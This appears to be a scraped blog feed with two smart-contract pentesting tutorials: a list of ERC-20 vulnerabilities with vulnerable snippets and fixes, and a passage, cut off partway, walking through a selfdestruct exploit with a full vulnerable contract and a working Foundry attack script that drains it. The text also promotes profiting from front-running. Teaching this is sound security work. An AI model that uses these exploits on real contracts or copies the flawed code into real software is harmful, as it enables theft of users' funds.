# Using OpenZeppelin for a More Secure ERC-20 Contract

In the previous example, we built our ERC-20 contract **from scratch**, implementing all the core functionalities manually. This was done to better understand how ERC-20 tokens work under the hood. However, in real-world development, most developers **don’t reinvent the wheel**—instead, they use battle-tested libraries like **OpenZeppelin**.

OpenZeppelin provides well-audited, secure, and gas-optimized implementations of common smart contract standards, including ERC-20. By leveraging these libraries, we reduce the risk of introducing vulnerabilities and simplify development.

Additionally, one function that is commonly used in ERC-20 tokens but was not present in our previous **DesertCoin** implementation is `mint()`. This function allows for new token issuance after deployment, making it useful for **inflationary tokens, reward-based systems, or governance models** where new tokens may need to be introduced over time.

Let’s see how our **DesertCoin** contract would look when using OpenZeppelin.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;@openzeppelin/contracts/token/ERC20/ERC20.sol&quot;;
import &quot;@openzeppelin/contracts/access/Ownable.sol&quot;;

contract DesertCoin is ERC20, Ownable {
    constructor(uint256 initialSupply) ERC20(&quot;DesertCoin&quot;, &quot;DSC&quot;) Ownable(msg.sender) {
        _mint(msg.sender, initialSupply * (10 ** decimals()));
    }

    function mint(address to, uint256 amount) public onlyOwner {
        _mint(to, amount);
    }
}

```

This implementation significantly reduces complexity by leveraging OpenZeppelin’s secure ERC-20 contract. Instead of manually writing the transfer, balance tracking, and approval logic, we **inherit** from the `ERC20` contract, which already provides all the required ERC-20 functionality.

The constructor initializes the token with a name (&quot;DesertCoin&quot;) and a symbol (&quot;DSC&quot;). It then calls `_mint()` to allocate the initial token supply to the deployer’s address. This means that upon deployment, all tokens will be assigned to the person who created the contract.

A key addition in this version is the `mint()` function. This function allows new tokens to be issued after deployment, but it is restricted by the `onlyOwner` modifier, which ensures that only the contract owner (the deployer by default) has the authority to mint more tokens. This prevents unauthorized inflation and maintains controlled token issuance.

By using OpenZeppelin’s `Ownable` contract, we also gain access to ownership management functions. This means the deployer can later transfer ownership to another address if needed, which is particularly useful for projects that might transition control to a DAO or governance contract.

# **Common ERC-20 Vulnerabilities: What to Watch for as a Pentester**

When pentesting ERC-20 tokens, it&apos;s essential to go beyond simple functional tests and actively look for **exploitable flaws**. While the ERC-20 standard is well-defined, implementation mistakes—or even design choices—can introduce **critical vulnerabilities** that lead to **theft, token manipulation, or denial-of-service (DoS) attacks**.

Below are some of the **most common and interesting ERC-20 vulnerabilities** that should be in every pentester’s checklist.

### 1️⃣ **Integer Overflows and Underflows: Breaking Balances**

Integer arithmetic bugs were one of the earliest attack vectors on Solidity smart contracts. Before **Solidity 0.8**, integer overflows and underflows could be used to **manipulate balances or supply calculations**, leading to fund mismanagement or even infinite tokens.

💥 **Attack Scenario:**  
If subtraction is performed **without proper checks**, a pentester can force an **underflow**, tricking the contract into **giving them a massive balance** due to Solidity’s wrap-around behavior (in older versions).

&lt;details&gt;
&lt;summary&gt;Example of a vulnerable implementation:&lt;/summary&gt;

```solidity
function transfer(address to, uint256 amount) public {
    balanceOf[msg.sender] -= amount; // Underflows if amount &gt; balance
    balanceOf[to] += amount;         // Overflows if amount is extremely large
}

```
&lt;/details&gt;


🔍 **Pentester’s checklist:**

-   Does the contract run on an older Solidity version (&lt;0.8)?
-   Does it manually handle arithmetic (`+`, `-`, `*`, `/`) instead of using **SafeMath** or Solidity’s built-in overflow protection?
-   Can we force an underflow by transferring **more tokens than we own**?

✅ **Solution:** Solidity 0.8+ **automatically reverts on overflows**, but older versions require `SafeMath` to prevent this issue.
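A quick illustration (hypothetical snippet, not from any contract above): in 0.8+ the checked subtraction reverts with an arithmetic panic, while wrapping the same operation in `unchecked` reproduces the legacy wrap-around that attackers exploited.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract UnderflowDemo {
    mapping(address =&gt; uint256) public balanceOf;

    // Solidity 0.8+: reverts with an arithmetic panic if amount &gt; balance
    function checkedDebit(uint256 amount) public {
        balanceOf[msg.sender] -= amount;
    }

    // Reproduces pre-0.8 behavior: silently wraps to a huge balance
    function uncheckedDebit(uint256 amount) public {
        unchecked {
            balanceOf[msg.sender] -= amount;
        }
    }
}
```

With a zero balance, `uncheckedDebit(1)` leaves `balanceOf[msg.sender]` at `2**256 - 1`: exactly the inflated balance an attacker aims for on a pre-0.8 contract.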

📖 **Want to see an exploit in action?** Check [Chapter 8](https://www.kayssel.com/post/web3-8/), where we analyze past attacks using integer overflows and test modern defenses.

### 2️⃣ **Approval Race Condition (`approve()` and `transferFrom()`)**

One of the most **dangerous** design flaws in ERC-20 is the **race condition in `approve()`**. If a user wants to update an approval, a **malicious spender can front-run the transaction** and steal funds before the new approval is set.

💥 **Attack Scenario:**

1.  Alice approves Bob to spend `100` tokens.
2.  Alice wants to lower Bob’s allowance to `50`, so she submits a transaction.
3.  Bob, monitoring the mempool, **front-runs the transaction** and quickly spends the `100` before the new approval takes effect.
4.  Once Alice’s update is processed, Bob **still has access to the new `50` tokens**.

🔍 **Pentester’s checklist:**

-   Can we front-run an approval transaction?
-   Does the contract use **OpenZeppelin’s `increaseAllowance()` and `decreaseAllowance()`** instead of `approve()`?
-   Can we create a bot to **monitor and exploit approve calls in real-time**?

**Potential Fix:**  
A safer pattern is to require that the allowance be reset to `0` before a new value can be set:

```solidity
function safeApprove(address spender, uint256 amount) public {
    require(allowance[msg.sender][spender] == 0, &quot;Must reset allowance first&quot;);
    allowance[msg.sender][spender] = amount;
}

```

Alternatively, using **OpenZeppelin’s `increaseAllowance()` and `decreaseAllowance()`** is recommended.

### 3️⃣ **Reentrancy Attacks: Draining the Contract**

If an ERC-20 token **interacts with external contracts** (e.g., in `transferFrom()` or a staking mechanism), **reentrancy vulnerabilities** can allow an attacker to **withdraw more tokens than they should be able to**.

💥 **Attack Scenario:**

-   The contract sends tokens to an **attacker-controlled contract**.
-   The attacker’s contract **re-enters** before the balance update is completed, forcing a second withdrawal.
-   The attacker loops the exploit until the contract is drained.

&lt;details&gt;
&lt;summary&gt;Example of a vulnerable implementation:&lt;/summary&gt;

```solidity
function transferFrom(address from, address to, uint256 amount) public {
    require(balanceOf[from] &gt;= amount, &quot;Not enough balance&quot;);
    require(allowance[from][msg.sender] &gt;= amount, &quot;Not allowed&quot;);

    balanceOf[from] -= amount;
    balanceOf[to] += amount;
    
    (bool success, ) = to.call(&quot;&quot;); // Allows reentrancy if &apos;to&apos; is a contract.
    require(success, &quot;Transfer failed&quot;);
}

```
&lt;/details&gt;


🔍 **Pentester’s checklist:**

-   Does the contract make **external calls before updating balances**?
-   Can we create a **reentrant contract** that exploits this behavior?
-   Does the contract **lack reentrancy guards** like `ReentrancyGuard` or **modifiers preventing multiple executions**?

✅ **Solution:** Use the **Checks-Effects-Interactions pattern**, updating balances **before** interacting with external contracts.
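Applied to the vulnerable snippet above, the fix looks like this (a sketch; the hook-style external call is kept only for illustration, and note the original also never decremented the allowance, which is corrected here):

```solidity
function transferFrom(address from, address to, uint256 amount) public {
    // Checks
    require(balanceOf[from] &gt;= amount, &quot;Not enough balance&quot;);
    require(allowance[from][msg.sender] &gt;= amount, &quot;Not allowed&quot;);

    // Effects: update ALL state before any external call
    balanceOf[from] -= amount;
    allowance[from][msg.sender] -= amount;
    balanceOf[to] += amount;

    // Interactions: a re-entrant call now sees fully updated state
    (bool success, ) = to.call(&quot;&quot;);
    require(success, &quot;Transfer failed&quot;);
}
```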

📖 **Want to execute a reentrancy attack?** In [**Chapter 4**](https://www.kayssel.com/post/web3-4/), we build an exploit contract and drain it using a **recursive attack function**.

### 4️⃣ **Minting Without Limits (Infinite Token Generation)**

ERC-20 tokens that **allow minting** need **strict controls**. If minting is unrestricted, **anyone could create unlimited tokens**, leading to **instant hyperinflation**.

💥 **Attack Scenario:**  
If `_mint()` is exposed without proper access control, a pentester could **generate infinite tokens** and sell them on an exchange before the exploit is patched.

❌ **Vulnerable implementation:**

```solidity
function mint(address to, uint256 amount) public {
    _mint(to, amount);
}

```

🔍 **Pentester’s checklist:**

-   Who has access to `_mint()`? Can **anyone call it**?
-   Is there a **max supply limit** enforced?
-   Can we execute **multiple mint calls** and sell the inflated tokens before detection?

✅ **Fix:** Restrict minting to the **contract owner or a specific role**:

```solidity
function mint(address to, uint256 amount) public onlyOwner {
    _mint(to, amount);
}

```

### 5️⃣ **Burning Mechanisms That Can Break Tokenomics**

Some ERC-20 tokens allow **burning tokens** (removing them from supply). However, improperly implemented burn functions can introduce unexpected consequences.

**Example of a dangerous `burn()` function:**

```solidity
function burn(uint256 amount) public {
    balanceOf[msg.sender] -= amount;
    totalSupply -= amount;
}

```

This implementation also skips the conventional `Transfer` event to the zero address, so explorers and indexers will not see the burn, and in Solidity 0.8+ burning more than the caller&apos;s balance reverts with a bare arithmetic panic instead of a descriptive error. On top of that, a user who burns their entire balance may lock themselves out of dApps that use `balanceOf() &gt; 0` checks for validation.

✅ **Fix:** Ensure that burning does not cause unintended consequences in dApps relying on token balance conditions.
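A more defensive version (a sketch extending the snippet above; the `Transfer` event declaration is shown for context) validates the balance and emits the conventional burn event so off-chain tooling can track supply:

```solidity
event Transfer(address indexed from, address indexed to, uint256 value);

function burn(uint256 amount) public {
    require(balanceOf[msg.sender] &gt;= amount, &quot;Insufficient balance to burn&quot;);

    balanceOf[msg.sender] -= amount;
    totalSupply -= amount;

    // Burns are conventionally reported as transfers to the zero address
    emit Transfer(msg.sender, address(0), amount);
}
```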

### 6️⃣ **Blacklisting / Centralization Risks**

Some tokens have **blacklist functions**, allowing an admin to freeze accounts. While useful for regulation compliance, **this can be abused** if one entity has too much control.

-   Can the owner arbitrarily freeze/unfreeze accounts?
-   Can token transfers be blocked suddenly?
-   Are there admin privileges that could be exploited?

If centralization is **too extreme**, it may defeat the purpose of being on-chain.

### 7️⃣ **Unbounded Loops: Gas Exhaustion and DoS**

Some ERC-20 implementations use **loops in storage mappings**, which can **cause excessive gas costs** and even break transactions if the loop grows too large.

```solidity
function batchTransfer(address[] memory recipients, uint256 amount) public {
    for (uint256 i = 0; i &lt; recipients.length; i++) {
        transfer(recipients[i], amount);
    }
}

```

If `recipients` is too large, **the transaction could run out of gas and revert**.

✅ **Fix:** Avoid unbounded loops over dynamic arrays inside transactions.
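One common mitigation (a sketch; the `MAX_BATCH` constant is an assumption) is to cap the batch size per call and let callers paginate across transactions:

```solidity
uint256 public constant MAX_BATCH = 100; // tune to the chain&apos;s block gas limit

function batchTransfer(address[] memory recipients, uint256 amount) public {
    require(recipients.length &lt;= MAX_BATCH, &quot;Batch too large&quot;);
    for (uint256 i = 0; i &lt; recipients.length; i++) {
        transfer(recipients[i], amount);
    }
}
```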

### 8️⃣ **Front-Running Attacks: Extracting Value from Transactions**

If an ERC-20 token interacts with **DEXs, AMMs, or pricing oracles**, it may be **vulnerable to front-running attacks**. These exploits occur when **attackers monitor pending transactions** and submit their own transactions **with a higher gas fee**, getting their trade executed first.

💥 **Attack Scenario:**  
A pentester spots a **large token swap in the mempool**, front-runs it by purchasing the token first, and then sells it back **at a higher price** due to the manipulated price impact.

🔍 **Pentester’s checklist:**

-   Are token swaps **executed deterministically**, making them predictable?
-   Can we front-run high-value transactions **on Uniswap or SushiSwap**?
-   Is the contract vulnerable to **Maximal Extractable Value (MEV) bots**?

📖 **Want to profit off front-running?** In [**Chapter 5**](https://www.kayssel.com/post/web3-5/), we build a **custom Flashbots bot** that detects ERC-20 price movements and executes MEV attacks on DeFi protocols.

# **Conclusions**

ERC-20 tokens may seem simple at first glance, but as we’ve seen, **their implementation can be full of hidden pitfalls**. From **integer overflows** and **approval race conditions** to **front-running exploits** and **reentrancy attacks**, even a small mistake in a contract’s logic can lead to **severe financial losses** or complete contract failure.

For pentesters, ERC-20 tokens present **a highly rewarding attack surface**. The sheer number of tokens deployed on Ethereum means there’s no shortage of **vulnerable implementations** waiting to be tested. And while standards like **OpenZeppelin** provide secure boilerplate implementations, **many projects still write custom logic**—often introducing new attack vectors in the process.

The key takeaways from this article are:  
✅ **Always check integer operations**—older contracts may still be vulnerable to overflows and underflows.  
✅ **Race conditions in approvals can lead to stolen funds**—use `increaseAllowance()` and `decreaseAllowance()` instead of `approve()`.  
✅ **Reentrancy isn’t just a DeFi problem**—even ERC-20 tokens can fall victim to recursive attacks.  
✅ **Unrestricted minting is a disaster waiting to happen**—check who has access to `_mint()` and whether a token has an enforced max supply.  
✅ **Front-running attacks are real**—especially in DeFi integrations where price-sensitive transactions can be manipulated.

From an offensive security standpoint, **fuzzing, unit tests, and manual review are critical tools** for discovering these flaws before attackers do. Tools like **Foundry** allow pentesters to simulate attacks, automate vulnerability discovery, and understand **how a contract behaves under stress**.

If you’re an auditor, developer, or someone looking to get into **smart contract security**, ERC-20 is an excellent starting point. The vulnerabilities here **apply to a wide range of Solidity contracts**, and understanding them will give you **a strong foundation for analyzing more complex protocols**.

# References

-   Ethereum Improvement Proposals. &quot;EIP-20: ERC-20 Token Standard.&quot; Available at: https://eips.ethereum.org/EIPS/eip-20
-   OpenZeppelin Documentation. &quot;ERC20: Standard Token Implementation.&quot; Available at: https://docs.openzeppelin.com/contracts/4.x/api/token/erc20
-   Solidity Documentation. &quot;Solidity 0.8.x Breaking Changes.&quot; Available at: https://docs.soliditylang.org/en/latest/080-breaking-changes.html
-   Solidity Documentation. &quot;SafeMath: Avoiding Integer Overflows and Underflows.&quot; Available at: https://docs.soliditylang.org/en/latest/security-considerations.html#integer-overflow-and-underflow
-   OpenZeppelin Blog. &quot;Understanding Reentrancy Attacks in Smart Contracts.&quot; Available at: https://blog.openzeppelin.com/reentrancy-after-istanbul/
-   Ethereum Improvement Proposals. &quot;EIP-2771: Secure Meta-Transactions.&quot; Available at: https://eips.ethereum.org/EIPS/eip-2771
-   OpenZeppelin Documentation. &quot;Preventing Reentrancy Attacks with ReentrancyGuard.&quot; Available at: https://docs.openzeppelin.com/contracts/4.x/api/security#ReentrancyGuard
-   OpenZeppelin Documentation. &quot;Using Ownable to Secure Smart Contract Ownership.&quot; Available at: https://docs.openzeppelin.com/contracts/4.x/api/access#Ownable</content:encoded><author>Ruben Santos</author></item><item><title>selfdestruct Unleashed: How to Hack Smart Contracts and Fix Them</title><link>https://www.kayssel.com/post/web3-13</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-13</guid><description>Explore how Ethereum’s powerful selfdestruct function can be exploited to bypass deposit restrictions and drain smart contract funds. This guide breaks down a real-world attack, explains the vulnerability, and provides actionable steps to secure contracts against similar exploits.</description><pubDate>Sun, 16 Feb 2025 10:45:38 GMT</pubDate><content:encoded># **Introduction**

In the world of smart contracts, every line of code has the potential to be the hero of a secure transaction—or the villain of a catastrophic exploit. Today, we’re diving into the fascinating, dangerous world of Ethereum exploits by uncovering how a seemingly innocent vulnerability can lead to **completely draining a contract’s balance** using nothing more than a **small deposit** and a **big brain.** 😎

Think of a treasure chest guarded by layers of traps and locks, with adventurers lining up to deposit their gold. It seems foolproof, right? But what if someone had a magic key—an overlooked loophole—that lets them bypass all that security and walk away with the treasure?

That’s exactly what we’re exploring today. We’ll show you how an attacker can use the **`selfdestruct`** mechanism to bypass a deposit limit and trick a vulnerable smart contract into giving them **all its funds.** And the best part? We’ll take you through the full journey: understanding the contract, identifying the flaw, building the exploit, and ultimately securing it to prevent future attacks.

In this adventure, you’ll see how **GrimoireOfDestruction**, a seemingly small helper contract, can cause a **big problem**. But don’t worry—by the end, you’ll also know how to stop it.

So, gear up and let’s dive into the **good, the bad, and the fixable** in smart contract security. Ready to steal (or protect) the treasure? Let’s go. 🏴‍☠️✨

# **The Power (and Danger) of `selfdestruct` in Smart Contracts**

Let’s talk about a powerful tool in the Ethereum world: the **`selfdestruct`** function. Think of it as a &quot;nuclear button&quot; that can permanently destroy a smart contract and send its remaining Ether to a specified address. But, like any dangerous tool, when misused—or even overlooked—it becomes a goldmine for attackers and a major point of interest for pentesters.

Originally, **`selfdestruct`** had two main effects:

1.  **Code wipeout:** The contract’s bytecode and storage were permanently deleted from the blockchain.
2.  **Ether transfer:** Any Ether held in the contract was transferred to the address specified during the call.

This made it a convenient way for developers to clean up unused contracts or implement emergency shutdowns. But it also opened the door for creative attackers. Why? Because developers often assume that Ether can only enter their contracts through controlled functions like `deposit()`. This assumption becomes fatal when **`selfdestruct`** allows Ether to be sent **directly** to the contract, bypassing all internal checks.

Imagine this: You’re testing a staking contract where rewards are calculated based on the total Ether balance. The developers built strict controls, assuming only their `deposit()` function could add funds. But as a clever pentester, you deploy a small &quot;helper&quot; contract, call **`selfdestruct(addressOfStakingContract)`**, and boom—instant Ether injection. The contract’s balance is inflated, the reward calculations are thrown off, and you can potentially withdraw unearned rewards.

To complicate things further, Ethereum’s **Cancun hard fork (EIP-6780)** changed how **`selfdestruct`** works. While the opcode still transfers Ether to the target address, it no longer deletes the contract’s code and storage unless the contract was created and destroyed within the same transaction. This change addresses some exploitation scenarios, but not all. Contracts that rely on their Ether balance without validating the source of the funds are still vulnerable.

So, why should you, as a pentester, care? Because **many contracts still don’t handle &quot;unexpected&quot; Ether correctly.** If a contract assumes its balance reflects only controlled deposits, you can often disrupt its logic by injecting funds directly via **`selfdestruct`**. This opens the door to all sorts of exploits, from manipulating staking rewards to bypassing access controls.

In the next section, we’ll dive into a simple yet vulnerable smart contract example, showing you how **`selfdestruct`** can be exploited to bypass restrictions and gain unintended rewards. Grab your tools—this is where it gets fun. 🔍👾

# **Breaking Down the `CrystalTowerTreasure` Contract: What Does It Do?**

Let’s take a step back and walk through how the **CrystalTowerTreasure** contract works. This smart contract is designed to act as a magical treasure chest where adventurers can deposit their &quot;gold&quot; (Ether) and later claim it along with potential rewards. The contract has a few key mechanics, and understanding them is crucial before we dive deeper into testing its security.

&lt;details&gt;
&lt;summary&gt;Vulnerable smart contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/console.sol&quot;;

contract CrystalTowerTreasure {
    address public owner;
    
    struct Adventurer {
        uint256 deposit;  // Magical gold deposited by the adventurer
        bool hasWithdrawn; // Whether they have already withdrawn their reward
    }

    mapping(address =&gt; Adventurer) public adventurers; // Record of adventurers
    uint256 public totalDeposits; // Total gold deposited in the treasure

    constructor() {
        owner = msg.sender;
    }

    // Adventurers deposit magical gold into the treasure
    function depositGold() public payable {
        require(msg.value &gt; 0, &quot;You must deposit a positive amount of gold.&quot;);
        require(!adventurers[msg.sender].hasWithdrawn, &quot;You already withdrew your rewards.&quot;);

        uint256 check_deposit = adventurers[msg.sender].deposit + msg.value;

        // If the sender is not the owner, enforce the 0.02 ETH limit
        if (msg.sender != owner) {
            require(check_deposit &lt;= 0.02 ether, &quot;You can&apos;t deposit more than 0.02 ETH.&quot;);
        }

        console.log(&quot;User %s deposited %s ETH&quot;, msg.sender, msg.value / 1 ether);
        
        // Record the adventurer&apos;s deposit
        adventurers[msg.sender].deposit += msg.value;
        totalDeposits += msg.value;

        console.log(&quot;Total deposits for user %s is now %s ETH&quot;, msg.sender, adventurers[msg.sender].deposit / 1 ether);
        console.log(&quot;Total deposits in contract: %s ETH&quot;, totalDeposits / 1 ether);
    }

    // Withdraw the deposited gold or the entire balance if it exceeds 15 ETH
    function claimTreasure() public {
        Adventurer storage adventurer = adventurers[msg.sender];
        require(adventurer.deposit &gt; 0, &quot;You have no gold in the treasure.&quot;);
        require(!adventurer.hasWithdrawn, &quot;You already withdrew your rewards.&quot;);

        // Get the current contract balance
        uint256 contractBalance = address(this).balance;
        uint256 amountToTransfer;

        if (contractBalance &gt; 15 ether) {
            // Transfer the entire contract balance
            amountToTransfer = contractBalance;
        } else {
            // Transfer only the user&apos;s deposit
            amountToTransfer = adventurer.deposit;
        }

        // Mark as withdrawn and update the total deposits
        adventurer.hasWithdrawn = true;
        totalDeposits -= adventurer.deposit;

        // Transfer the gold
        payable(msg.sender).transfer(amountToTransfer);
    }
}


```
&lt;/details&gt;


Here’s a detailed breakdown of the main components and functions:

## 📜 **1\. Key Variables**

```solidity
address public owner;
mapping(address =&gt; Adventurer) public adventurers;
uint256 public totalDeposits;

```

-   **`owner`**: The address of the contract’s owner, which is set when the contract is deployed. The owner is special and can deposit more Ether than normal users.
-   **`adventurers`**: A mapping that stores details for each adventurer, tracking how much they’ve deposited and whether they’ve already withdrawn their treasure.
-   **`totalDeposits`**: The total amount of Ether deposited into the contract through legitimate deposits.

These variables help the contract track deposits and withdrawals for each adventurer while keeping an overall record of total deposits.

## 🏛 **2\. Struct: Adventurer**

```solidity
struct Adventurer {
    uint256 deposit;
    bool hasWithdrawn;
}

```

The **`Adventurer`** struct stores two key pieces of information:

-   **`deposit`**: The amount of Ether deposited by the adventurer.
-   **`hasWithdrawn`**: A flag indicating whether the adventurer has already withdrawn their rewards. This helps prevent double withdrawals.

## 💰 **3\. Constructor: Setting Up the Contract**

```solidity
constructor() {
    owner = msg.sender;
}

```

When the contract is deployed, the address that deploys it becomes the **owner**. This owner has special privileges—specifically, they’re allowed to deposit more than 0.02 ETH, unlike regular users.

## 📥 **4\. `depositGold()`: How Adventurers Deposit Ether**

```solidity
function depositGold() public payable {
    require(msg.value &gt; 0, &quot;You must deposit a positive amount of gold.&quot;);
    require(!adventurers[msg.sender].hasWithdrawn, &quot;You already withdrew your rewards.&quot;);

    uint256 check_deposit = adventurers[msg.sender].deposit + msg.value;

    if (msg.sender != owner) {
        require(check_deposit &lt;= 0.02 ether, &quot;You can&apos;t deposit more than 0.02 ETH.&quot;);
    }

    adventurers[msg.sender].deposit += msg.value;
    totalDeposits += msg.value;
}

```

This function handles deposits from users and ensures that certain conditions are met before accepting the Ether:

-   Users must deposit a positive amount of Ether.
-   Users who have already withdrawn their treasure cannot deposit again.
-   **Non-owners** can only deposit up to 0.02 ETH in total. This limit prevents users from depositing large amounts and ensures fairness among adventurers. The owner, however, is allowed to bypass this restriction.

When the deposit is successful:

-   The **`deposit`** amount for the user is updated.
-   The **`totalDeposits`** variable is incremented.

The contract logs the details of each deposit, providing useful feedback for developers or anyone monitoring the contract.

## 🏆 **5\. `claimTreasure()`: How Adventurers Withdraw Ether**

```solidity
function claimTreasure() public {
    Adventurer storage adventurer = adventurers[msg.sender];
    require(adventurer.deposit &gt; 0, &quot;You have no gold in the treasure.&quot;);
    require(!adventurer.hasWithdrawn, &quot;You already withdrew your rewards.&quot;);

    uint256 contractBalance = address(this).balance;
    uint256 amountToTransfer;

    if (contractBalance &gt; 15 ether) {
        amountToTransfer = contractBalance;
    } else {
        amountToTransfer = adventurer.deposit;
    }

    adventurer.hasWithdrawn = true;
    totalDeposits -= adventurer.deposit;

    payable(msg.sender).transfer(amountToTransfer);
}

```

This function allows users to withdraw their deposits or potentially claim the entire contract balance under certain conditions. Here’s how it works:

1.  The contract checks that the user has a valid deposit and hasn’t already withdrawn their treasure.
2.  It calculates how much Ether to transfer:
    -   If the contract’s balance is greater than 15 ETH, the user is entitled to withdraw the **entire balance** of the contract.
    -   Otherwise, the user can only withdraw the amount they originally deposited.
3.  The withdrawal is marked as complete, and the **`totalDeposits`** variable is updated.
4.  The Ether is transferred to the user using **`payable(msg.sender).transfer(amountToTransfer)`**.

## ⚙️ **How Does It All Fit Together?**

-   Adventurers (users) deposit Ether into the contract using **`depositGold()`**, and their deposits are tracked internally.
-   The contract enforces deposit limits for regular users (0.02 ETH) but allows the owner to deposit more.
-   When users call **`claimTreasure()`**, they can withdraw their deposit or potentially the entire contract balance if certain conditions are met.

# **The Exploit: How to Steal All the Ether from `CrystalTowerTreasure`**

It’s time to unleash the attack. Our goal is simple but ambitious: **bypass the restriction that only allows us to deposit 0.02 ETH and drain the contract’s entire balance.** How do we achieve this? By exploiting the fact that the contract blindly trusts its Ether balance without verifying the source of those funds. But before we jump into the exploit, let’s first deploy the vulnerable contract using the deployment script below.

## **Deployment Script**

This script initializes the **CrystalTowerTreasure** contract and deposits 10 ETH on behalf of the owner. The funds we deposit here will later be at risk once the exploit is executed.

```solidity
pragma solidity 0.8.0;

import &quot;forge-std/Script.sol&quot;;
import &quot;../src/CrystalTowerTreasure.sol&quot;;

contract Deploy is Script {
    function run() external {
        vm.startBroadcast(vm.envUint(&quot;PRIVATE_KEY&quot;));

        // Deploy the vulnerable CrystalTowerTreasure contract
        CrystalTowerTreasure tower = new CrystalTowerTreasure();

        // Log the deployment address
        console.log(&quot;TreasureChest deployed at:&quot;, address(tower));

        // Initial deposit of 10 ETH from the contract owner
        tower.depositGold{value: 10 ether}();

        vm.stopBroadcast();
    }
}

```

![](/content/images/2025/02/image-1.png)

Deploy Script

With the contract deployed and 10 ETH sitting in its treasure chest, the stage is set for our exploit. In the next section, we’ll walk you through how to deploy another contract, **GrimoireOfDestruction**, inject 5 ETH using `selfdestruct`, and trick the contract into handing over its entire balance. Ready to break in? Let’s go. 🏴‍☠️💸

## **The Attack Plan**

We’ll take advantage of a helper contract, the **GrimoireOfDestruction**, to send Ether directly into the vulnerable **CrystalTowerTreasure** contract using **`selfdestruct`**. By doing this, we bypass the normal deposit mechanism and inflate the contract’s balance, tricking it into giving us everything it has when we call **`claimTreasure()`**.

Here’s the overview of what we’ll do:

1.  **Deploy the `GrimoireOfDestruction` contract** and send it 5 ETH.
2.  **Use `selfdestruct` to transfer the 5 ETH directly into the `CrystalTowerTreasure`** contract, bypassing its deposit checks.
3.  **Make a small, legitimate deposit of 0.01 ETH** through the normal deposit function to ensure we’re registered as an adventurer.
4.  **Call `claimTreasure()` to drain the entire balance of the contract**, exploiting the fact that it trusts the total balance instead of only registered deposits.

```mermaid
sequenceDiagram
    participant Attacker
    participant GrimoireOfDestruction
    participant CrystalTowerTreasure

    Attacker-&gt;&gt;GrimoireOfDestruction: Deploy contract with 5 ETH
    GrimoireOfDestruction-&gt;&gt;CrystalTowerTreasure: selfdestruct() sends 5 ETH directly
    CrystalTowerTreasure--&gt;CrystalTowerTreasure: Balance updated (5 ETH added)

    Attacker-&gt;&gt;CrystalTowerTreasure: Legitimate deposit of 0.01 ETH
    CrystalTowerTreasure-&gt;&gt;CrystalTowerTreasure: Register adventurer and update total deposits

    Attacker-&gt;&gt;CrystalTowerTreasure: Call claimTreasure()
    CrystalTowerTreasure-&gt;&gt;Attacker: Transfer full contract balance (including injected 5 ETH)
    Attacker-&gt;&gt;Attacker: Successfully drain the entire balance

```

Let’s dive into the attack code to see how it works in detail.

## **Exploit Contract**

Let’s take a detailed walkthrough of the exploit script to understand how it bypasses the 0.02 ETH limit and drains the vulnerable **CrystalTowerTreasure** contract.

```solidity
pragma solidity 0.8.0;

import &quot;forge-std/Script.sol&quot;;
import &quot;../src/Payload.sol&quot;;  // The GrimoireOfDestruction contract
import &quot;../src/CrystalTowerTreasure.sol&quot;;  // The vulnerable contract

contract Exploit is Script {
    function run() external {
        vm.startBroadcast(vm.envUint(&quot;ATTACKER_PK&quot;));  // Start transaction as attacker
        CrystalTowerTreasure tower = CrystalTowerTreasure(0x5FbDB2315678afecb367f032d93F642f64180aa3);
        address attacker = vm.envAddress(&quot;ATTACKER_ADDR&quot;);

        console.log(&quot;Attack balance at start: &quot;, attacker.balance);

        // Step 1: Deploy the GrimoireOfDestruction contract with 5 ETH
        GrimoireOfDestruction grimoire = new GrimoireOfDestruction{value: 5 ether}();
        console.log(&quot;GrimoireOfDestruction deployed at: &quot;, address(grimoire));
        console.log(&quot;Balance: &quot;, address(grimoire).balance);

        // Step 2: Execute selfdestruct to transfer 5 ETH directly into the treasure contract
        grimoire.castDestructionSpell(payable(address(tower)));

        // Step 3: Legitimate deposit of 0.01 ETH to be registered as an adventurer
        tower.depositGold{value: 0.01 ether}();
        console.log(&quot;Balance of tower: &quot;, address(tower).balance / 1 ether);

        // Step 4: Call claimTreasure to drain the contract&apos;s entire balance
        tower.claimTreasure();

        console.log(&quot;Attack finished balance: &quot;, attacker.balance / 1 ether);
        vm.stopBroadcast();  // End transaction
    }
}

```

### **Starting the Exploit**

```solidity
vm.startBroadcast(vm.envUint(&quot;ATTACKER_PK&quot;));
CrystalTowerTreasure tower = CrystalTowerTreasure(0x5FbDB2315678afecb367f032d93F642f64180aa3);
address attacker = vm.envAddress(&quot;ATTACKER_ADDR&quot;);

console.log(&quot;Attack balance at start: &quot;, attacker.balance);


```

We begin by:

-   Starting the transaction as the attacker using their private key (`ATTACKER_PK`).
-   Setting up a reference to the **CrystalTowerTreasure** contract at its deployed address.
-   Fetching the attacker’s address and logging their starting balance.

This initial setup ensures that we have everything we need to interact with the vulnerable contract and carry out the attack.

### **Deploying the Grimoire of Destruction**

```solidity
GrimoireOfDestruction grimoire = new GrimoireOfDestruction{value: 5 ether}();
console.log(&quot;GrimoireOfDestruction deployed at: &quot;, address(grimoire));
console.log(&quot;Balance: &quot;, address(grimoire).balance);

```

Next, we deploy the **GrimoireOfDestruction** contract and send it 5 ETH during deployment. This contract is the key to bypassing the 0.02 ETH deposit restriction using **`selfdestruct`**.

-   The 5 ETH we send during deployment will later be transferred directly into the **CrystalTowerTreasure** contract.
-   We log the address of the **GrimoireOfDestruction** contract and its initial balance.

### **Executing `selfdestruct` to Inject 5 ETH**

```solidity
grimoire.castDestructionSpell(payable(address(tower)));

```

Here’s where the magic happens:

-   We call the **`castDestructionSpell()`** function, which triggers the **`selfdestruct`** opcode.
-   The **`selfdestruct`** function transfers the entire balance (5 ETH) of the **GrimoireOfDestruction** contract directly into the **CrystalTowerTreasure** contract.
-   **Why does this work?** Because **`selfdestruct`** transfers Ether without executing any code on the recipient: neither **`depositGold()`** nor the `receive`/`fallback` functions run, so the contract’s balance grows while its internal deposit-tracking variables stay untouched.

At this point, the **CrystalTowerTreasure** contract’s balance reflects the additional 5 ETH, but it doesn’t know where this Ether came from. This is the core of the exploit.

### **Making a Legitimate Deposit of 0.01 ETH**

```solidity
tower.depositGold{value: 0.01 ether}();
